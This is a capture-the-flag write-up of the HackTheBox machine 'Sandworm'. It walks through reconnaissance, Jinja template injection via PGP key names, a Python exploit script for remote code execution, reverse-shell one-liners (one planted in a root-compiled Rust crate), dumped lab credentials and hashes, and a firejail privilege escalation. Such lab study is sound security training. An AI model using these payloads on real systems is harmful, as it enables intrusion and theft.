Snadworm is a HackTheBox lab Linux machine released on 17/6/23 in Beta Season II.
This machine features:
Server-side Template Injection
Port Scanning
A quick port scanning shows us there're ports 22
, 80
, and 443
Copy $ sudo nmap -p- -n -Pn -sS -T4 --min-rate 1000 -v -oN ports.nmap
22/tcp open ssh
80/tcp open http
443/tcp open https
The certificate returned tells us the hostname is ssa.htb
Copy $ openssl s_client -connect < I P > :443 -showcerts
CONNECTED(00000003 )
Can 't use SSL_get_servername
depth=0 C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
verify error:num=18:self signed certificate
verify return:1
depth=0 C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
verify return:1
Certificate chain
0 s:C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
i:C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
We can also see the same information in the HTTP 301
response using curl
Copy $ curl -i
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 18 Jun 2023 13:46:03 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://ssa.htb/
We then add this hostname to our host file /etc/host
No common vhosts can be found using ffuf
Copy $ ffuf -u https://ssa.htb -H 'Host: FUZZ.ssa.htb' -w path_to_subdomains-top1million-5000.txt -fs 8161
The footer suggests that the site is built on Flask .
URL Path
We can crawl hypertext and embedded links with the Python script like this .
Copy $ https://ssa.htb links.txt
More paths like admin
, login
, logout
, view
, and process
can be found using ffuf
Copy $ ffuf -u https://ssa.htb/FUZZ -w path_to_raft-medium-words.txt
admin [Status: 302, Size: 227, Words: 18, Lines: 6, Duration: 24ms]
login [Status: 200, Size: 4392, Words: 1374, Lines: 83, Duration: 65ms]
contact [Status: 200, Size: 3543, Words: 772, Lines: 69, Duration: 104ms]
logout [Status: 302, Size: 229, Words: 18, Lines: 6, Duration: 123ms]
view [Status: 302, Size: 225, Words: 18, Lines: 6, Duration: 89ms]
about [Status: 200, Size: 5584, Words: 1147, Lines: 77, Duration: 94ms]
process [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 82ms]
guide [Status: 200, Size: 9043, Words: 1771, Lines: 155, Duration: 76ms]
pgp [Status: 200, Size: 3187, Words: 9, Lines: 54, Duration: 119ms]
The site allows users to submit PGP-encrypted messages with a guide about how to use PGP.
PGP Guide
In the guide, the site implements functionalities including PGP decrypting, encrypting, and verifying.
Decrypt Verifying
We can find the pgp in /pgp
, save it to ssa.gpg
, and import it for the recipient atlas@ssa.htb
using gpg
Copy $ gpg --import ssa.gpg
$ gpg --list-keys
pub rsa4096 2023-05-04 [SC]
uid [ unknown] SSA (Official PGP Key of the Secret Spy Agency. ) < atlas@ssa.htb >
sub rsa4096 2023-05-04 [E]
We can encrypt some content for atlas@ssa.htb
Copy $ echo hello > file
$ gpg -e -r atlas --output file.asc --armor file
$ cat file.asc
VPdu7ZOY4gNF+BoLfRZQ3Ju6/rkqSw ==
We see that the message is decrypted successfully.
Unlike other functions, the site also implements javascript code for verifying signed messages.
Copy $ (document) .ready ( function () {
$ ( ".verify-form" ) .submit ( function (e) {
e .preventDefault ();
var signed_text = $ ( "#signed_text" ) .val ();
var public_key = $ ( "#public_key" ) .val ();
$ .ajax ({
type : "POST" ,
url : "/process" ,
data : { signed_text : signed_text , public_key : public_key } ,
success : function (result) {
$ ( "#signature-result" ) .html (result);
$ ( "#signature-modal" ) .modal ( "show" );
Although the form action /guide/verify
is still usable.
The response indicates that the site uses GnuPG
in the backend.
Initial Access
Server-side Template Injection
Since the server will render the decrypted message controlled by us, we shall try to test if any server-side template injection vulnerability exists.
We've seen that the site is built using Flask; hence it may use Jinja as its template engine.
We first encrypt the message, where the string hi
will be comment out in Jinja:
using the target's PGP and we submit through the encryption function.
We see the content is rendered successfully, which indicates that no template injection can be abused here.
We try to generate a keypair for the user named {#hi#}yes
this time and we submit the message signed with this key through the verifying function.
Copy $ gpg --list-keys yes
pub rsa3072 2023-06-20 [SC] [expires: 2025-06-19]
uid [ultimate] {#hi#}yes
sub rsa3072 2023-06-20 [E] [expires: 2025-06-19]
We see the string {#hi#}
disappears this time, which indicates that we've found a SSTI vulnerability.
Remote Code Execution
To abuse the vulnerability to achieve remote code execution, we shall generate keypairs with usernames like {{__import__('os').system('ls')}}
To automate the process, we write the following script using python-gnupg
and cmd
Copy #!/usr/bin/python3
import cmd
import requests
import logging
import shlex
import gnupg
from subprocess import Popen , PIPE
from bs4 import BeautifulSoup as bs
requests . packages . urllib3 . disable_warnings ()
logger = logging . getLogger ( __name__ )
class Exploit ( cmd . Cmd ):
def __init__ ( self ):
super (). __init__ ()
self . proxies = {
'https' : 'http://localhost:8080'
self . url = 'https://ssa.htb'
self . getPGP ()
self . gpg = gnupg . GPG ()
self . secret = 's3cret'
def get ( self , * kargs , ** kw ):
res = requests . get ( * kargs, verify = False , proxies = self.proxies, ** kw)
return res
def post ( self , * kargs , ** kw ):
res = requests . post ( * kargs, verify = False , proxies = self.proxies, ** kw)
return res
def getPGP ( self ):
res = self . get (self.url + '/pgp' )
pgp = bs (res.text, 'lxml' ). select ( 'pre' ) [ 0 ] . text
print (pgp)
with open ( 'ssa.pgp' , 'w' ) as o :
logger . debug ( f "got pgp { pgp[: 100 ] } " )
o . write (pgp)
pGPExists = b 'atlas@ssa.htb' in Popen (shlex. split ( 'gpg --list-keys' ), stdout = PIPE). communicate () [ 0 ]
logger . debug ( f "target's PGP exists: { pGPExists } " )
if not pGPExists :
Popen (shlex. split ( 'gpg --import ssa.pgp' ))
def inject ( self , payload ):
name = "Python---> {{%s}} " % payload
logger . debug ( f "name { name } " )
key = self . gpg . gen_key (self.gpg. gen_key_input (name_real = name, name_email = '' , passphrase = self.secret))
signed = self . gpg . sign ( 'hello' , keyid = key.fingerprint, passphrase = self.secret). data
data = {
'signed_text' : signed ,
'public_key' : self . gpg . export_keys (key.fingerprint)
res = self . post (self.url + '/process' , data = data)
print (res.text)
def default ( self , cmd ):
self . inject (cmd)
def do_EOF ( self , _ ):
return True
e = Exploit ()
e . cmdloop ()
We can also execute remote commands via Python code like request.application.__globals__.__builtins__.__import__('os').popen('ls').read()
Copy ( cmd ) request.application.__globals__.__builtins__.__import__( 'os' ).popen( 'id' ) .read ()
[GNUPG:] GOODSIG 7BF5637BBF510011 Python--- > uid = 1000 ( atlas ) gid = 1000 ( atlas ) groups = 1000 ( atlas )
< >
gpg: Good signature from "Python--->uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
We can get a reverse shell too.
Copy ( Cmd ) request.application.__globals__.__builtins__.__import__( 'os' ).system( 'python3 -c "import socket,pty,os;s=socket.socket();s.connect((\"\",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn(\"/bin/bash\");"' )
Credential Hunting
We see the source of the site is under the path /var/www/html/SSA/SSA
We can see the cause of the SSTI is the usage of render_template_string
We found the MySQL credential atlas:GarlicAndOnionZ42
Copy atlas@sandworm:/var/www/html/SSA/SSA$ cat
from flask import Flask
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy ()
def create_app () :
app = Flask ( __name__ )
app.config[ 'SECRET_KEY' ] = '91668c1bc67132e3dcfb5b1a3e0c5c21'
app.config[ 'SQLALCHEMY_DATABASE_URI' ] = 'mysql://atlas:GarlicAndOnionZ42@'
We found the PGP key's passphrase $M1DGu4rD$
Copy ...
@main . route ( "/contact" , methods = ( 'GET' , 'POST' ,))
def contact ():
if request . method == 'GET' :
return render_template ( "contact.html" , name = "contact" )
tip = request . form [ 'encrypted_text' ]
if not validate (tip):
return render_template ( "contact.html" , error_msg = "Message is not PGP-encrypted." )
msg = gpg . decrypt (tip, passphrase = '$M1DGu4rD$' )
We can use Python package sqlalchemy
to access the MySQL database SSA
Copy import sqlalchemy
engine = sqlalchemy . create_engine ( 'mysql://atlas:GarlicAndOnionZ42@' )
conn = engine . connect ()
conn . execute (sqlalchemy. text ( 'SELECT * FROM users;' ))
We can then obtain a list of usernames and password hashes.
Copy [(1, 'Odin', 'pbkdf2:sha256:260000$q0WZMG27Qb6XwVlZ$12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f'), (2, 'silentobserver', 'pbkdf2:sha256:260000$kGd27QSYRsOtk7Zi$0f52e0aa1686387b54d9ea46b2ac97f9ed030c27aac4895bed89cb3a4e09482d')]
By formatting the hashes above as, for example, 12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f:q0WZMG27Qb6XwVlZ
, we can try to use hashcat
to crack the password with mode 1460.
In file ~/.config/httpie/sessions/localhost_5000/admin.json
, we found credential silentobserver:quietLiketheWind22
Copy atlas@sandworm:~/.config/httpie$ cat sessions/localhost_5000/admin.json
"__meta__" : {
"about" : "HTTPie session file" ,
"help" : "" ,
"httpie" : "2.6.0"
"auth" : {
"password" : "quietLiketheWind22" ,
"type" : null,
"username" : "silentobserver"
"cookies" : {
"session" : {
"expires" : null,
"path" : "/" ,
"secure" : false ,
"value" : "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
"headers" : {
"Accept" : "application/json, */*;q=0.5"
We can login to the target using SSH with this credential now.
Privilege Escalation
Crate tipnet
We found a crate named tipnet
located under directory /opt
The compiled binary has SUID permission set.
Copy silentobserver@sandworm:~$ ls -l /opt/tipnet/target/debug/tipnet
-rwsrwxr-x 2 atlas atlas 59047248 Jun 6 10:00 /opt/tipnet/target/debug/tipnet
We note that this crate uses an external crate logger
located in /opt/crates/logger
Copy silentobserver@sandworm:~$ cat /opt/tipnet/Cargo.toml
name = "tipnet"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at
chrono = "0.4"
mysql = "23.0.1"
nix = "0.18.0"
logger = {path = "../crates/logger" }
System Activities Monitoring
We can use the tool pspy64
to monitor system activities.
Copy silentobserver@sandworm:~$ ./pspy64 -f
We see that the crate is compiled and executed by cargo run
every 1 minute and 50 seconds by root
using user atlas
with mode e
Copy 2023/06/21 09:10:01 CMD: UID= 0 PID= 25158 | /usr/sbin/CRON -f -P
2023/06/21 09:10:01 CMD: UID= 0 PID= 25157 | /usr/sbin/cron -f -P
2023/06/21 09:10:01 CMD: UID= 0 PID= 25156 | /usr/sbin/CRON -f -P
2023/06/21 09:10:01 CMD: UID= 0 PID= 25161 | /bin/cp -p /root/Cleanup/webapp.profile /home/atlas/.config/firejail/
2023/06/21 09:10:01 CMD: UID= 0 PID= 25160 | /bin/bash /root/Cleanup/
2023/06/21 09:10:01 CMD: UID= 0 PID= 25159 | /bin/sh -c /bin/bash /root/Cleanup/
2023/06/21 09:10:01 CMD: UID= 0 PID= 25164 | /bin/sudo -u atlas /usr/bin/cargo run --offline
2023/06/21 09:10:01 CMD: UID= 0 PID= 25162 | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline
2023/06/21 09:10:01 CMD: UID= 0 PID= 25165 |
2023/06/21 09:10:01 CMD: UID= 0 PID= 25166 | /bin/sh -c sleep 10 && /root/Cleanup/
2023/06/21 09:10:01 CMD: UID= 0 PID= 25167 | sleep 10
2023/06/21 09:10:01 CMD: UID= 1000 PID= 25168 |
2023/06/21 09:10:01 CMD: UID= 1000 PID= 25169 |
2023/06/21 09:10:01 CMD: UID= 1000 PID= 25170 | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed
2023/06/21 09:10:01 CMD: UID= 1000 PID= 25172 | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro --print=sysroot --print=cfg
2023/06/21 09:10:01 CMD: UID= 1000 PID= 25174 | /usr/bin/cargo run --offline
2023/06/21 09:10:11 CMD: UID= 0 PID= 25179 | /bin/bash /root/Cleanup/
2023/06/21 09:10:11 CMD: UID= 0 PID= 25180 | /bin/rm -r /opt/crates
2023/06/21 09:10:11 CMD: UID= 0 PID= 25181 | /bin/cp -rp /root/Cleanup/crates /opt/
2023/06/21 09:10:11 CMD: UID= 0 PID= 25182 | /bin/bash /root/Cleanup/
2023/06/21 09:12:01 CMD: UID= 0 PID= 25188 | /usr/sbin/CRON -f -P
2023/06/21 09:12:01 CMD: UID= 0 PID= 25187 | /usr/sbin/CRON -f -P
2023/06/21 09:12:01 CMD: UID= 0 PID= 25189 | /bin/sh -c sleep 10 && /root/Cleanup/
2023/06/21 09:12:01 CMD: UID= 0 PID= 25190 | sleep 10
2023/06/21 09:12:01 CMD: UID= 0 PID= 25191 |
2023/06/21 09:12:01 CMD: UID= 0 PID= 25193 | /bin/sudo -u atlas /usr/bin/cargo run --offline
We also see that the crate's source codes under /opt/crates
are overwritten in 10 seconds after the crate is executed.
Copy 2023/06/21 09:10:11 CMD: UID= 0 PID= 25179 | /bin/bash /root/Cleanup/
2023/06/21 09:10:11 CMD: UID= 0 PID= 25180 | /bin/rm -r /opt/crates
2023/06/21 09:10:11 CMD: UID= 0 PID= 25181 | /bin/cp -rp /root/Cleanup/crates /opt/
2023/06/21 09:10:11 CMD: UID= 0 PID= 25182 | /bin/bash /root/Cleanup/
2023/06/21 09:12:01 CMD: UID= 0 PID= 25188 | /usr/sbin/CRON -f -P
2023/06/21 09:12:01 CMD: UID= 0 PID= 25187 | /usr/sbin/CRON -f -P
2023/06/21 09:12:01 CMD: UID= 0 PID= 25189 | /bin/sh -c sleep 10 && /root/Cleanup/
2023/06/21 09:12:01 CMD: UID= 0 PID= 25190 | sleep 10
2023/06/21 09:12:01 CMD: UID= 0 PID= 25191 |
2023/06/21 09:12:01 CMD: UID= 0 PID= 25193 | /bin/sudo -u atlas /usr/bin/cargo run --offline
We can also find that the credential we found early is put there deliberately.
Copy 2023/06/21 04:15:01 CMD: UID= 0 PID= 19806 | /bin/cp -p /root/Cleanup/admin.json /home/atlas/.config/httpie/sessions/localhost_5000/
User atlas
We found that we can modify the content of the source of the crate logger
which is used in the SUID program tipnet
owned by the user atalas
Copy silentobserver@sandworm:~$ ls -l /opt/crates/logger/src/
-rw-rw-r-- 1 atlas silentobserver 732 May 4 17:12 /opt/crates/logger/src/
So, we shall be able to execute commands as the user atlas
, if we overwrite the source code /opt/crates/logger/src/
after the script /root/Cleanup/
being executed and before the next compilation triggered by CRON.
We insert the following code after the script /root/Cleanup/
being executed.
Copy ...
use std :: process :: Command ;
pub fn log (user : & str , query : & str , justification : & str ) {
let o = Command :: new ( "python3" ) . args ( & [ "-c" , "import socket,pty,os;s=socket.socket();s.connect((\"\",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn(\"/bin/bash\");" ]) . output () . expect ( "none" );
println! ( "{}" , String :: from_utf8 (o . stdout) . unwrap ());
Then we shall receive a reverse shell later.
We note that the user if in the group jailer
, users of which can run the setuid-root program firejail
to sandbox processes.
Copy atlas@sandworm:~$ id
uid = 1000 ( atlas ) gid = 1000 ( atlas ) groups = 1000 ( atlas ) ,1002 ( jailer )
atlas@sandworm:~$ ls -l /usr/local/bin/firejail
-rwsr-x--- 1 root jailer 1777952 Nov 29 2022 /usr/local/bin/firejail
The version of the program firejail
seems to suffer the local privilege escalation vulnerability.
Copy $ atlas@sandworm:~ $ firejail --version
firejail version 0.9.68
By using the exploit, we can get the root user.